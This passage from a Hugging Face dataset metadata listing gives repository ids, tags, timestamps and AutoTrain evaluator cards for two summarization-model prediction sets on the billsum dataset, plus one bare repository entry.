Thanks to [@pszemraj](https://huggingface.co/pszemraj) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-billsum-18299d18-11955600 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-27T02:49:36+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["billsum"], "eval_info": {"task": "summarization", "model": "pszemraj/led-base-book-summary", "metrics": [], "dataset_name": "billsum", "dataset_config": "default", "dataset_split": "test", "col_mapping": {"text": "text", "target": "summary"}}} | 2022-07-27T09:17:44+00:00 |
3ab156a12e3f1fecc0271712a0709c4ff979715f | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Summarization
* Model: pszemraj/long-t5-tglobal-base-16384-book-summary
* Dataset: billsum
* Config: default
* Split: test
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@pszemraj](https://huggingface.co/pszemraj) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-billsum-a6bd4aa5-11965601 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-27T02:50:02+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["billsum"], "eval_info": {"task": "summarization", "model": "pszemraj/long-t5-tglobal-base-16384-book-summary", "metrics": [], "dataset_name": "billsum", "dataset_config": "default", "dataset_split": "test", "col_mapping": {"text": "text", "target": "summary"}}} | 2022-07-27T20:10:35+00:00 |
643d3b34887839055d1a1d41cee511eb2baaac31 | hong/FLO | [
"license:afl-3.0",
"region:us"
] | 2022-07-27T03:05:59+00:00 | {"license": "afl-3.0"} | 2022-07-27T03:05:59+00:00 |